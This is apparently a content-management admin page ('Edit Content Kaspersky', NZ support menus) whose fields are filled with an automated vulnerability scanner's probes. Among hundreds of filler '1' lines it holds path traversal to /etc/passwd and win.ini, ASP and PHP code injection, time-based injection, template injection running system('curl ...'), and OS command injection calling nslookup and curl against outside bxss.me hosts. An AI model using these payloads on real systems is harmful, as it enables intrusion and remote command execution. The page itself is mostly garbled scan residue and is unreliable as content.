Menu and Content Administration
Edit Content Kaspersky
Skip Navigation Links.
Collapse Menu ContentMenu Content
Collapse Contact NZContact NZ
Trials NZ
Trials Business NZ
Technical Support NZ
Collapse Business Technical Support NZBusiness Technical Support NZ
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
/../../../../../../../../../../windows/system32/BITSADMIN.exe
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
response.write(9015203*9252015)
1
1
1
'+response.write(9015203*9252015)+'
1
"+response.write(9015203*9252015)+"
1
<% response.write(9015203*9252015) %>
1
+response.write(9015203*9252015)'
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
38Fv0aS1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
12345'"\'\");|]*{ <>?''??
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
1
1
1
file:///etc/passwd
1
1
1
1
1
1
1
../1
1
1
1
./1
1
1
1
1
1
1
1
1"||sleep(27*1000)*sywmae||"
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
HttP://bxss.me/t/xss.html?%00
1
1
1
1
1
1
1
bxss.me/t/xss.html?%00
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
'.gethostbyname(lc('hitjj'.'kcfjzminb7fc8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(86).chr(102).chr(85).'
1
1
1
1
1
1
1
".gethostbyname(lc("hitox"."oiimbdmma0ab6.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(80).chr(97).chr(69)."
1
1
1
gethostbyname(lc('hitgo'.'ypkdtvewbd693.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(85).chr(108).chr(74)
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
c:/windows/win.ini
1
1
1
1
1
1
1
bxss.me
1
Http://bxss.me/t/fit.txt
1
1
1
1
1
1
1
1
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
1
1
1
1
1
1
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
1
1
1
1
1
1
)
1
1
1
1
1
!(()&&!|*|*|
1
1
1
1
^(#$!@#$)(()))******
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
redirtest.acx
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
(nslookup -q=cname hitoioxhciaij53a4a.bxss.me||curl hitoioxhciaij53a4a.bxss.me))
|echo evvcxq$()\ sybhik\nz^xyu||a #' |echo evvcxq$()\ sybhik\nz^xyu||a #|" |echo evvcxq$()\ sybhik\nz^xyu||a #
1
1|echo hdtchq$()\ afnyag\nz^xyu||a #' |echo hdtchq$()\ afnyag\nz^xyu||a #|" |echo hdtchq$()\ afnyag\nz^xyu||a #
expr 9000503063 - 964201
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1&n974908=v927762
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
echo pbzqyu$()\ yhtjwh\nz^xyu||a #' &echo pbzqyu$()\ yhtjwh\nz^xyu||a #|" &echo pbzqyu$()\ yhtjwh\nz^xyu||a #
1
1
&echo flymen$()\ ydwcvx\nz^xyu||a #' &echo flymen$()\ ydwcvx\nz^xyu||a #|" &echo flymen$()\ ydwcvx\nz^xyu||a #
1
1
1&echo frlkzg$()\ bazkub\nz^xyu||a #' &echo frlkzg$()\ bazkub\nz^xyu||a #|" &echo frlkzg$()\ bazkub\nz^xyu||a #
1
1
1
1
1
1
1
1
1
1
1
1
$(nslookup -q=cname hitkxurnmicla6ba44.bxss.me||curl hitkxurnmicla6ba44.bxss.me)
1
&nslookup -q=cname hitphqmishzxl99c7b.bxss.me&'\"`0&nslookup -q=cname hitphqmishzxl99c7b.bxss.me&`'
1
1
&(nslookup -q=cname hitcihvanxentd52d0.bxss.me||curl hitcihvanxentd52d0.bxss.me)&'\"`0&(nslookup -q=cname hitcihvanxentd52d0.bxss.me||curl hitcihvanxentd52d0.bxss.me)&`'
1
1
1
|(nslookup -q=cname hitlktfspmvzj9ce87.bxss.me||curl hitlktfspmvzj9ce87.bxss.me)
1
`(nslookup -q=cname hitujldugnpdu23eb7.bxss.me||curl hitujldugnpdu23eb7.bxss.me)`
1
1
1
1
1
1
;(nslookup -q=cname hitvfszgmfkzxd832b.bxss.me||curl hitvfszgmfkzxd832b.bxss.me)|(nslookup -q=cname hitvfszgmfkzxd832b.bxss.me||curl hitvfszgmfkzxd832b.bxss.me)&(nslookup -q=cname hitvfszgmfkzxd832b.bxss.me||curl hitvfszgmfkzxd832b.bxss.me)
1
1
1
1
1
|(nslookup${IFS}-q${IFS}cname${IFS}hitymzpxxbmlp9366b.bxss.me||curl${IFS}hitymzpxxbmlp9366b.bxss.me)
1
&(nslookup${IFS}-q${IFS}cname${IFS}hithpaakhxftp8127d.bxss.me||curl${IFS}hithpaakhxftp8127d.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hithpaakhxftp8127d.bxss.me||curl${IFS}hithpaakhxftp8127d.bxss.me)&`'
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
${9999628+9999065}
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1'&&sleep(27*1000)*llkzjz&&'
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1"&&sleep(27*1000)*cluydd&&"
1
1'||sleep(27*1000)*fxhdwh||'
1
1
1
1
1
1
1
1
'"()
1
1
1
1
1
1
http://bxss.me/t/fit.txt?.jpg
1
1
1
1
1
1
1
1
1
/etc/shells
1
../../../../../../../../../../../../../../etc/shells
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1'"
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
editcontentkas.aspx
1
1
paddingeditcontentkas.aspx
1
1
editcontentkas.aspx
1
1
paddingeditcontentkas.aspx
1
editcontentkas.aspx/.
1
1
paddingeditcontentkas.aspx/.
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1'"()&%
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hithzasfsqqdbe11d0.bxss.me")}}
'"()&%
19602555
<%={{={@{#{${dfb}}%>
1
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
1
1
1
1
1
xfs.bxss.me
1
1
1
1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1
1
1
1
1
1
1
1
';print(md5(31337));$a='
1
1
1
1
1
1
1
1
";print(md5(31337));$a="
1
1
1
1
1
${@print(md5(31337))}
1
1
1
1
${@print(md5(31337))}\
1
1
1
1
1
1
1
1
'.print(md5(31337)).'
1
1
1
1
1
1
1
1
1
1
1
1
1
1
'"
1
1
1
1
1